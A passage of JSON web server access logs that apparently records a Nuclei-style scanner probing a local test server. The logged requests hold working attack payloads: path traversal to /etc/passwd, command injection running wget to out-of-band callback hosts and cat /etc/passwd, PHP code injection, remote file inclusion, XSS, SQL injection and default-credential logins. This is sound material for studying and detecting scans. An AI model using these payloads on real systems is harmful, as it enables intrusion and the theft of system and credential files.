+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://c9v8hs0smpv8c6ag07h0bp5weu8myidbn.oast.online`;wget http://c9v8hs0smpv8c6ag07h095ogcysjwhndy.oast.online&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=stream HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.206","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_2/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=/etc/issue HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fpui/loginServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=Admin-Data-down&id=../../Conf/config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"zerodiumvar_dump(233*233);", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/krgourl.php?DOCUMENT_ROOT=http://c9v8hn0smpv8c57g0t00q6nqwbq8zenke.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.016","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/297MdjgPVIuEsbN6wcT3Sr51iqz/)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /FileZilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(297MdtrNoVnayQECqAzl57VjxZn)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:34 